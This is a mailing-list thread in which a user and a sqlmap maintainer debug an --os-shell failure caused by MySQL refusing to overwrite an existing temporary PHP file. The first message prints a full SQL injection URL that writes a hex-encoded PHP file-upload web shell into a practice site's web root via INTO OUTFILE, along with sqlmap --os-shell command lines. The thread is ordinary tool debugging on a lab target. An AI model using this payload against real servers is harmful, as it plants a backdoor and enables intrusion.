Re: [sqlmap-users] SQLmap --os-shell BUG
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] SQLmap --os-shell BUG
|
From: Miroslav S. <mir...@gm...> - 2015-07-04 23:01:56
|
Something is really wrong happening here. One user is having the identical problem like you (AttributeError: 'NoneType' object has no attribute 'replace') and I am not able to reproduce. Can you please rerun your sqlmap version with " http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get the same error? Bye On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote: > Just clone git and got 1.0-dev-166dc98 version but got a unhandled > exception error: > > ./sqlmap.py -u > http://OwaspPractice/injection/lessons/lesson03/index.php?code=N > --os-shell --prefix "\")" --flush-session -v3 > > /sqlmap'. If the exception persists, please open a new issue at ' > https://github.com/sqlmapproject/sqlmap/issues/new' with the following > text and any other information required to reproduce the bug. The > developers will try to reproduce the bug, fix it accordingly and get back > to you > sqlmap version: 1.0-dev-166dc98 > Python version: 2.7.3 > Operating system: posix > Command line: sqlmap.py -u > ********************************************************************* > --os-shell --prefix ") --flush-session -v3 > Technique: None > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "sqlmap.py", line 102, in main > start() > File "lib/controller/controller.py", line 514, in start > injection = checkSqlInjection(place, parameter, value) > File "lib/controller/checks.py", line 391, in checkSqlInjection > reqPayload = agent.payload(place, parameter, newValue=boundPayload, > where=where) > File "lib/core/agent.py", line 188, in payload > retVal = _(regex, "%s=%s" % (parameter, > self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) > AttributeError: 'NoneType' object has no attribute 'replace' > > > On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> I believe that you are using an old revision. For a long time there is at >> least a git revision or a pseudo "non-git" number appearing when "sqlmap >> --version" is being used. >> >> Please update to the latest revision from the official github repository >> and rerun the sqlmap. >> >> Bye >> >> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote: >> >>> Thanks >>> >>> sqlmap --version >>> sqlmap/1.0-dev >>> >>> In the meantime I will patch procs/mysql/write_file_limit.sql >>> >>> >>> >>> >>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar < >>> mir...@gm...> wrote: >>> >>>> Which revision/version of sqlmap do you use? There has been a related >>>> patch a month ago. Will check tomorrow. >>>> >>>> Bye >>>> >>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote: >>>> >>>>> Hello list, there is an issue with sqlmap when using the --os-shell >>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian) >>>>> >>>>> Description: >>>>> >>>>> A specific PAYLOAD (see below) used to upload a web shell will create >>>>> an empty file e.g. tmpbezff.php, this will cause that every subsequent >>>>> PAYLOAD attempt will fail with an "already exist" error and therefore not >>>>> able to upload the web shell. >>>>> >>>>> >>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+ >>>>> >>>>> By default, MySQL will throw an error if the file already exists: >>>>> >>>>> mysql> select 'ss' into outfile >>>>> '/var/www/OwaspPractice/upload/tmpbezff.php'; >>>>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php' >>>>> already exists >>>>> >>>>> Solution: >>>>> >>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least >>>>> when using the -os-shell option >>>>> 2. Fix the PAYLOAD causing problems. >>>>> >>>>> -- >>>>> DanUx >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> Don't Limit Your Business. Reach for the Cloud. >>>>> GigeNET's Cloud Solutions provide you with the tools and support that >>>>> you need to offload your IT needs and focus on growing your business. >>>>> Configured For All Businesses. Start Your Cloud Today. >>>>> https://www.gigenetcloud.com/ >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm >>>> >>> >>> >>> >>> -- >>> DanUx >>> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > > > -- > DanUx > -- Miroslav Stampar http://about.me/stamparm |
